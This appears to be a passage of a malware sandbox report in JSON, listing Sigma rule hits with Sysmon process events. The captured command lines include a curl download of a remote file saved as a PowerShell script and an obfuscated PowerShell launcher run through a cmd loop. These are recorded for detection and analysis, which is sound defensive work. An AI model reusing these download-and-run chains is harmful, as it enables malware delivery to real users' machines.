"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/qdke.ini\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Hashes": "SHA1=3D6861E137699ADD6E1DB51E2F9D96A9FC4F122D,MD5=1089F6E6C6C219009F75C637ED302F99,SHA256=5A1D9329C862C908B050896FEFA49628D00A914EE2155CEFCAA7704BD1A5E2C8,IMPHASH=FF24CEF596AA4AA9D65391184A89D008",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoE [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7752bbd4e940ef58081260cfa45b4ac6b149e2cecb836d79f5e61bfbdc237105",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "File And SubFolder Enumeration Via Dir Command",
"rule_description": "Detects usage of the \"dir\" command part of Windows CMD with the \"/S\" command line flag in order to enumerate files in a specified directory and all subdirectories.\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Hashes": "SHA1=E563BAE25E3C011A1E69B4636C9B29B5661C460A,MD5=89B5A70BF37A93015F4845BF901B7825,SHA256=678652BB50ABB92DE91A69C05EA018C160FB4BE0902ACE14B15749246788CB40,IMPHASH=FD97AFEC4DC549DCD1FE1DAD15035DF9",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
}
],
"last_submission_date": 1773805950,
"first_submission_date": 1773805950,
"total_votes": {
"harmless": 0,
"malicious": 0
}
}
}
}